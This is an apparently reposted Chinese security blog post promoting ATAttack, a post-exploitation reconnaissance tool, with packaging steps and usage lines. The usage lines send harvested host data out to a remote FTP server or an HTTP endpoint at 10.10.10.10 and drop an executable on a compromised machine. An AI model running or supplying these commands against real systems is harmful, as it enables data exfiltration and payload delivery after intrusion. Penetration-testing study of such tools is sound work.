【神兵利器】后渗透半自动化侦察Tools(附下载)

admin 2023年1月29日18:26:26评论24 views字数 828阅读2分45秒阅读模式

0x01 前言

每获取一台机器权限,如果每次都手动操作重复一样的信息收集工作,无疑加大了工作量,既为了能更好的获取内网进一步突破点攻击面,这段闲暇时间造了个简易的轮子,其在真实环境中发现较多未知问题,欢迎大家踊跃提交 issue 和 PR !

0x02 简介

ATAttack款后渗透半自动化侦察工具,它从进攻性和防御性安全角度执行许多面向安全性的主机调查“安全检查”。

【神兵利器】后渗透半自动化侦察Tools(附下载)

0x03 打包ATAttack二进制文件

测试打包环境:
Python 2.7.15PyInstaller 3.4Windows 10
通过UPX压缩,使得ATAttack程序落地更小
下载UPX(测试环境upx-3.95-win64版本)https://github.com/upx/upx/releases
pip安装pyinstallerpip install pyinstaller
进入ATAttack目录,并通过upx压缩pyinstaller -F exploit.py --upx-dir=upx-3.95-win64
成功打包二进制控制台单文件ATAttackdist]exploit.exe

0x04 快照预览

Win10测试环境

【神兵利器】后渗透半自动化侦察Tools(附下载)

Win2008测试环境:

【神兵利器】后渗透半自动化侦察Tools(附下载)

0x05 使用方法

存储于本地临时文件夹:

python exploit.py

回传远程FTP服务器:

python exploit.py -t ftp_host -u ftp_user -p ftp_pwd

通过PUT请求回传http服务端

python exploit.py -d http://10.10.10.10:8000/

HTTP分块传输落地可执行文件

python http_client.py -d http://10.10.10.10./exploit.exe -u http://10.10.10.10:8000/

0x06 获取方式

https://github.com/c1y2m3/ATAttack

【神兵利器】后渗透半自动化侦察Tools(附下载)

原文始发于微信公众号(渗透Xiao白帽):【神兵利器】后渗透半自动化侦察Tools(附下载)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年1月29日18:26:26
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【神兵利器】后渗透半自动化侦察Tools(附下载)https://cn-sec.com/archives/1400179.html

发表评论

匿名网友 填写信息